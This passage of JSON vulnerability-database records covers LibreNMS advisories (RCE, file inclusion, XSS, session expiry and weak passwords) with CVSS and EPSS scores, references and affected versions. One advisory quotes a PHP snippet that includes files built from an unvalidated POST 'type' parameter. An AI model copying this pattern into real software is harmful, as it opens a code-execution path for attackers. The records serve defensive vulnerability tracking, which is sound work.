server.","references":[{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-6204","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-6204"},{"reference_url":"https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc"},{"reference_url":"https://github.com/advisories/GHSA-7549-ggpq-22w8","reference_id":"GHSA-7549-ggpq-22w8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7549-ggpq-22w8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109874?format=json","purl":"pkg:composer/librenms/librenms@26.3.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.3.0"}],"aliases":["GHSA-7549-ggpq-22w8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7s6j-vmn5-p7eh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110150?format=json","vulnerability_id":"VCID-7srz-umtt-n7e1","summary":"Insufficient Session Expiration in librenms/librenms\nInsufficient Session Expiration in GitHub repository librenms/librenms prior to 22.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4070","reference_id":"","reference_type":"","scores":[{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00142","published_at":"2026-06-05T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00139","published_at":"2026-06-09T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00141","published_at":"2026-06-07T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00143","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4070"},{"reference_url":"https://github.com/librenms/librenms/commit/ce8e5f3d056829bfa7a845f9dc2757e21e419ddc","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-14T18:14:00Z/"}],"url":"https://github.com/librenms/librenms/commit/ce8e5f3d056829bfa7a845f9dc2757e21e419ddc"},{"reference_url":"https://huntr.dev/bounties/72d426bb-b56e-4534-88ba-0d11381b0775","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-14T18:14:00Z/"}],"url":"https://huntr.dev/bounties/72d426bb-b56e-4534-88ba-0d11381b0775"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4070","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4070"},{"reference_url":"https://github.com/advisories/GHSA-x93j-3hh3-6x23","reference_id":"GHSA-x93j-3hh3-6x23","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x93j-3hh3-6x23"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-4070","GHSA-x93j-3hh3-6x23"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7srz-umtt-n7e1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48066?format=json","vulnerability_id":"VCID-8ks5-6azh-67ed","summary":"LibreNMS alert-rules has a Cross-Site Scripting Vulnerability\n**Product:** LibreNMS\n**Vendor:** LibreNMS\n**Vulnerability Type:** Cross-Site Scripting (XSS)\n**CVSS Score:** 4.3 (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L)\n**Affected Version:** 25.8.0 (latest at time of discovery)\n**POC File:** [Download POC](https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/EQYQOiGddUtOtz6739YUFU4B5FkNob_TvKBYEA8P6lSRQw?e=lDOR5W)\n**Ticket:** ZDI-CAN-28105: LibreNMS Alert Rules Cross-Site Scripting Vulnerability","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62412","reference_id":"","reference_type":"","scores":[{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00028","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62412"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"3.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/dccdf6769976a974d70f06a7ce8d5a846b29db6f","reference_id":"","reference_type":"","scores":[{"value":"3.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-16T18:25:48Z/"}],"url":"https://github.com/librenms/librenms/commit/dccdf6769976a974d70f06a7ce8d5a846b29db6f"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/25.10.0","reference_id":"","reference_type":"","scores":[{"value":"3.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/releases/tag/25.10.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62412","reference_id":"CVE-2025-62412","reference_type":"","scores":[{"value":"3.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62412"},{"reference_url":"https://github.com/advisories/GHSA-6g2v-66ch-6xmh","reference_id":"GHSA-6g2v-66ch-6xmh","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6g2v-66ch-6xmh"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-6g2v-66ch-6xmh","reference_id":"GHSA-6g2v-66ch-6xmh","reference_type":"","scores":[{"value":"3.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-16T18:25:48Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-6g2v-66ch-6xmh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70986?format=json","purl":"pkg:composer/librenms/librenms@25.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-y5mq-m57f-b3bx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.10.0"}],"aliases":["CVE-2025-62412","GHSA-6g2v-66ch-6xmh"],"risk_score":1.7,"exploitability":"0.5","weighted_severity":"3.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8ks5-6azh-67ed"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57697?format=json","vulnerability_id":"VCID-8nsn-f1fc-6ucm","summary":"LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE\nLibreNMS 25.6.0 contains an architectural vulnerability in the `ajax_form.php` endpoint that permits Remote File Inclusion based on user-controlled POST input.\n\nThe application directly uses the `type` parameter to dynamically include `.inc.php` files from the trusted path `includes/html/forms/`, without validation or allowlisting:\n\n```php\nif (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {\ninclude_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';\n}\n```\nThis pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.\n\n>  This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54138","reference_id":"","reference_type":"","scores":[{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.2469","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24699","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24805","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24817","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24747","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54138"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-07-23T18:26:36Z/"}],"url":"https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81"},{"reference_url":"https://github.com/librenms/librenms/pull/17990","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-07-23T18:26:36Z/"}],"url":"https://github.com/librenms/librenms/pull/17990"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/25.7.0","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-07-23T18:26:36Z/"}],"url":"https://github.com/librenms/librenms/releases/tag/25.7.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54138","reference_id":"CVE-2025-54138","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54138"},{"reference_url":"https://github.com/advisories/GHSA-gq96-8w38-hhj2","reference_id":"GHSA-gq96-8w38-hhj2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gq96-8w38-hhj2"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2","reference_id":"GHSA-gq96-8w38-hhj2","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-07-23T18:26:36Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70832?format=json","purl":"pkg:composer/librenms/librenms@25.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.7.0"}],"aliases":["CVE-2025-54138","GHSA-gq96-8w38-hhj2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8nsn-f1fc-6ucm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56209?format=json","vulnerability_id":"VCID-98mh-t1va-xqa8","summary":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Port Settings\" page allows authenticated users to inject arbitrary JavaScript through the \"descr\" parameter when editing a device's port settings. This vulnerability can lead to the execution of malicious code when the \"Port Settings\" page is visited, potentially compromising the user's session and allowing unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51494","reference_id":"","reference_type":"","scores":[{"value":"0.00861","scoring_system":"epss","scoring_elements":"0.75431","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00861","scoring_system":"epss","scoring_elements":"0.75441","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00861","scoring_system":"epss","scoring_elements":"0.75443","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00861","scoring_system":"epss","scoring_elements":"0.75437","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00861","scoring_system":"epss","scoring_elements":"0.75418","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51494"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:02:34Z/"}],"url":"https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51494","reference_id":"CVE-2024-51494","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51494"},{"reference_url":"https://github.com/advisories/GHSA-7663-37rg-c377","reference_id":"GHSA-7663-37rg-c377","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7663-37rg-c377"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-7663-37rg-c377","reference_id":"GHSA-7663-37rg-c377","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:02:34Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-7663-37rg-c377"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-51494","GHSA-7663-37rg-c377"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-98mh-t1va-xqa8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48397?format=json","vulnerability_id":"VCID-99dx-dees-2fg3","summary":"LibreNMS has Weak Password Policy\nA **Weak Password Policy** vulnerability was identified in the user management functionality of the _LibreNMS_ application. This vulnerability allows administrators to create accounts with extremely weak and predictable passwords, such as `12345678`. This exposes the platform to brute-force and credential stuffing attacks.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65014","reference_id":"","reference_type":"","scores":[{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00024","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65014"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65014","reference_id":"CVE-2025-65014","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65014"},{"reference_url":"https://github.com/advisories/GHSA-5mrf-j8v6-f45g","reference_id":"GHSA-5mrf-j8v6-f45g","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5mrf-j8v6-f45g"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g","reference_id":"GHSA-5mrf-j8v6-f45g","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-19T14:53:12Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71437?format=json","purl":"pkg:composer/librenms/librenms@25.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg